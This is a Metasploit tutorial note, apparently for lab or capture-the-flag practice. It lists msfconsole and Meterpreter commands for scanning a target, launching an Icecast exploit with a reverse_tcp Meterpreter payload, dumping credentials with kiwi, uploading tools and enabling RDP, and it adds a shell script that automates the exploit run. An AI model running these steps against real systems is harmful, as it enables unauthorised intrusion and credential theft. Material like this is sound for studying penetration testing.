# Metasploit 101

###### tags: `cyber security` `exploitation` `metasploit`

## MSF architecture

![](https://i.imgur.com/QQjFOGF.png)

### Modules

**Exploit**: contains the code that triggers a vulnerability on the target and delivers a payload.

**Payload**: the code that runs on the target once the exploit has compromised it, e.g. a reverse shell or a Meterpreter stager.

**Encoder**: re-encodes the payload so that its bytes look different in transit and on disk, which can defeat simple signature matching (it is not a reliable way to evade modern AV/EDR).

**NOP**: used in buffer overflow and ROP attacks. A NOP generator produces sequences of instructions that do nothing useful but are not the classic `0x90` bytes, so the NOP sled does not match standard IDS/IPS sled signatures.

**Auxiliary**: performs actions that are not exploitation themselves, e.g. scanning, fuzzing and DoS. Usually used to find hosts and verify that they look exploitable before picking an exploit.

**Post**: post-exploitation modules that run over an existing session, used for looting (credentials, files, host information) and pivoting.

### How to use

Set up the database and start the console from a shell:

```bash
# start postgresql so msf can use its database (faster startup, persistent results)
systemctl start postgresql
# initialise the msf database (first run only)
msfdb init
# start msf
msfconsole
```

Inside `msfconsole`:

```
# check db connection
db_status
# add a workspace called ham, then switch to it
workspace -a ham
workspace ham
# run an nmap scan of the target, e.g. 10.10.3.4, and store the results in the db
db_nmap -sV -vv 10.10.3.4
# list services found
services
# list hosts found (populated by db_nmap; a ping sweep of a range is db_nmap -sn 10.10.3.0/24)
hosts
# get help, e.g. on hosts
hosts -h
# search for a module, e.g. icecast
search icecast
# select a module by its full path (or by its index in the search results, e.g. use 0)
use exploit/windows/http/icecast_header
# display info for the module
info
# display options for the module
options
# set options, e.g. the target and the address the payload connects back to
set RHOSTS 10.10.3.4
set LHOST 10.2.3.4
# set the payload before launching, e.g. a meterpreter reverse tcp shell
set payload windows/meterpreter/reverse_tcp
# save console output to a file (spool off to stop)
spool /tmp/ham.log
# check vulns recorded in the db so far (populated by scanners and successful exploits)
vulns
# launch the exploit in the foreground
exploit
# or launch it as a background job
exploit -j
# list sessions, then interact with one by id
sessions -l
sessions -i 1
```

Inside a Meterpreter session:

```
# list processes and migrate into a more stable one (e.g. explorer.exe) by pid
ps
migrate <pid>
# enable every privilege available to the current process
getprivs
# load the mimikatz extension and dump credentials (needs SYSTEM on the target)
load kiwi
creds_all
# transfer a file to the target (example paths)
upload /tmp/tool.exe C:\\Windows\\Temp\\tool.exe
# check if the windows target is a vm
run post/windows/gather/checkvm
# look for local privilege escalation exploits that match the target
run post/multi/recon/local_exploit_suggester
# try enabling rdp on the target
run post/windows/manage/enable_rdp
```
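The console steps above can be replayed without retyping them by putting them in a Metasploit resource script and passing it to `msfconsole -r`. The following POSIX shell script is an added example, not part of the original note: it writes such a resource script, sanity-checks every line against an allow-list of the console commands used on this page (so a typo like `vuln` or `session` is caught before the run, instead of failing half-way through), and runs `msfconsole` only if it is installed. The workspace `ham`, the target `10.10.3.4`, the listener `10.2.3.4`, the module `exploit/windows/http/icecast_header` (the framework's Icecast header overwrite exploit, matching the note's `search icecast`) and the payload are assumed values chosen to match the note; the allow-list is this script's own choice.

```shell
#!/bin/sh
# Added example (not from the original note): generate a Metasploit resource
# script that replays the recon + exploitation workflow, check it, and hand it
# to msfconsole -r when msfconsole is available. All values are assumptions.
set -eu

# Write the resource script for one target.
# Arguments: workspace, RHOSTS, LHOST, module path, payload, output file.
build_rc() {
  workspace="$1"; rhosts="$2"; lhost="$3"; module="$4"; payload="$5"; out="$6"
  cat > "$out" <<EOF
# recon: own workspace, log everything, scan straight into the db
workspace -a ${workspace}
workspace ${workspace}
spool /tmp/${workspace}.log
db_nmap -sV -vv ${rhosts}
services
hosts
vulns
# exploitation: module, options, payload, run as a background job
use ${module}
set RHOSTS ${rhosts}
set LHOST ${lhost}
set PAYLOAD ${payload}
exploit -j
sessions -l
spool off
EOF
}

# Allow-list check: the first word of every non-comment, non-empty line must be
# one of the console commands used in this note. Returns 1 on the first unknown
# command, so a typo is reported before msfconsole ever sees the file.
check_rc() {
  for cmd in $(grep -v '^#' "$1" | awk 'NF { print $1 }'); do
    case "$cmd" in
      workspace|spool|db_nmap|services|hosts|vulns|use|set|exploit|sessions) ;;
      *) echo "unknown msfconsole command: $cmd" >&2; return 1 ;;
    esac
  done
}

main() {
  rc="$(mktemp)"
  build_rc ham 10.10.3.4 10.2.3.4 \
    exploit/windows/http/icecast_header windows/meterpreter/reverse_tcp "$rc"
  check_rc "$rc"
  if command -v msfconsole >/dev/null 2>&1; then
    # -q skips the banner, -r runs the resource script then drops to the prompt
    msfconsole -q -r "$rc"
  else
    echo "msfconsole not found; resource script written to $rc"
  fi
}

main "$@"
```

Lines beginning with `#` are ignored by the resource-script loader, so the comments in the generated file are safe to keep; `exploit -j` backgrounds the exploit so the script finishes and leaves you at the prompt with `sessions -l` already printed.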
### Additional references

- https://docs.rapid7.com/metasploit/
- https://www.tutorialspoint.com/metasploit/index.htm
- https://nooblinux.com/metasploit-tutorial/
- https://www.metasploit.com/get-started
- https://www.esecurityplanet.com/products/metasploit-framework-tutorial/